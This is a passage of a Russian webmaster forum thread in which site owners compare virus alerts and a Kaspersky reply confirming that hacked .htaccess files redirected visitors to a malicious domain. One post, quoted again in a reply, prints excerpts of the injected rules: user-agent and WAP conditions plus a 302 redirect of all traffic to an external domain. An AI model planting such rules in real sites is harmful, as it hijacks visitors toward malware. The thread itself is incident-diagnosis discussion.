Вирус на сайте (?)

1 2345 6
Den73
На сайте с 26.06.2010
Offline
523
#21
6666:
Den73, и редирект на антигугль.ру не надо удалять?

не разглядел редирект перед написанием, да все верно у вас из за него так, нод тоже ругается на антигугль.

кто то у вас поработал там.

6666
На сайте с 10.01.2005
Offline
505
#22
Den73:
кто то у вас поработал там.

Ага. Касперский подтверждаеэ

Здравствуйте,

Это не ложное срабатывание. Сайт был взломан, был заменён файл .htaccess.
Если вы являетесь вебмастером данного ресурса, необходимо исправить данный файл и отписать нам на newvirus@kaspersky.com
-------------------------------------------
Каждое мое сообщение проверила и одобрила Елена Летучая. (c) Для меня очень важно все что Вы говорите! (http://surrealism.ru/123.mp3) .
Diversant
На сайте с 29.03.2006
Offline
329
#23

А я бы поменял и обратно поставил бы хтаксеес и зашел бы с мобильного, посмотрел бы что это за партнерка и отписался бы в саппорт партнерки! И атата бы можно было сделать редиске взломщику :)

6666
На сайте с 10.01.2005
Offline
505
#24
Diversant:
посмотрел бы что это за партнерка

так там один только урл - www.antigoogle.ru не открывается, походу стуканули и накрыли инвалидов.. туда им и дорога..

IP
На сайте с 30.06.2012
Offline
31
#25
6666:
так там один только урл - www.antigoogle.ru не открывается, походу стуканули и накрыли инвалидов.. туда им и дорога..

Только не antigoogle, а antgoogle.

Сегодня обнаружил на всех сайтах площадки такую же хрень.

Independence
На сайте с 29.10.2005
Offline
428
#26

Утро началось недобро. На одном из сайтов такое...

Антивирусная проверка сайта шлет на мейл визги, что по адресу вида:

... /webalizer/usage_200801.html

обнаружено зло в виде:

winnow.botnet.ff.trojans.23137.UNOFFICIAL

В процессе проверки на сервере найдены "левые" файлы: index.php, cn.php, wap.php, config, system, где файл config составляет более 20 Мб. (нафига?)

В файле htaccess найдены традиционные для таких тем

RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]

...

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

...

RewriteRule ^(.*)$ http://adresdolbodyatlov.net/?a=u2w4t2w423m254l [L,R=302]

Естественно, пришлось писать в суппорт разобраться, что за фигня. Ответа пока не пришло.

Какие будут мнения?

На первый взгляд все дело может быть в Webalizer, там дыра и тогда это явный прокол хостера. Но может я и ошибаюсь, и нужно в своих скриптах дыру поискать, больше особо негде, так как каких-то внешних форумов, CMS и пр. на этом сайте не стоит. И PHP я не пользуюсь тоже.

Более интересный вопрос - украли ли какой-то контент с сайта и пр. информацию, так как там самописные скрипты и пр.? Как это можно определить? В чем цель взлома была?

Если просто детишки балуются, чтобы лишние пару-тройку $$$ с партнерки срубить, то ладно, а вот если чего украсть хотели, учетные данные пользователей и пр. - тут вопрос, может и в полицию заявить имеет смысл, так как сайт серьезный?

ToriRat
На сайте с 23.10.2010
Offline
73
#27
Independence:
Утро началось недобро. На одном из сайтов такое...

Антивирусная проверка сайта шлет на мейл визги, что по адресу вида:
... /webalizer/usage_200801.html
обнаружено зло в виде:
winnow.botnet.ff.trojans.23137.UNOFFICIAL

В процессе проверки на сервере найдены "левые" файлы: index.php, cn.php, wap.php, config, system, где файл config составляет более 20 Мб. (нафига?)

В файле htaccess найдены традиционные для таких тем
RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]
...
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
...
RewriteRule ^(.*)$ http://adresdolbodyatlov.net/?a=u2w4t2w423m254l [L,R=302]

Естественно, пришлось писать в суппорт разобраться, что за фигня. Ответа пока не пришло.

Какие будут мнения?


На первый взгляд все дело может быть в Webalizer, там дыра и тогда это явный прокол хостера. Но может я и ошибаюсь, и нужно в своих скриптах дыру поискать, больше особо негде, так как каких-то внешних форумов, CMS и пр. на этом сайте не стоит. И PHP я не пользуюсь тоже.

Более интересный вопрос - украли ли какой-то контент с сайта и пр. информацию, так как там самописные скрипты и пр.? Как это можно определить? В чем цель взлома была?

Если просто детишки балуются, чтобы лишние пару-тройку $$$ с партнерки срубить, то ладно, а вот если чего украсть хотели, учетные данные пользователей и пр. - тут вопрос, может и в полицию заявить имеет смысл, так как сайт серьезный?

Вы случайно хоститесь не у РБК? Сегодня с утра на всех сайтах, которые расположены у них, обнаружен winnow.botnet.ff.trojans.23137.UNOFFICIAL. С утра шлют оповещения, что на сайтах вирусы.

C
На сайте с 25.12.2008
Offline
83
#28

+ 1 тоже прислали на несколько проектов ))

G
На сайте с 14.10.2012
Offline
0
#29

Подтверждаю информацию, Хостинг Центр РБК прислал такую же хрень - троян winnow.botnet.ff.trojans.23137.UNOFFICIAL.зараженных файлов больше 50

scooter2007
На сайте с 02.03.2011
Offline
86
#30

Подтверждаю! Сегодня ночью прислали уведомление, что сайт заражен (botnet.ff.trojans.23137). Проверил руками - ничего не нашел. Хостинг HC

Лиды на заказ для вашего бизнеса. https://t.me/lidynazakaz Сайты в аренду.
1 2345 6

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий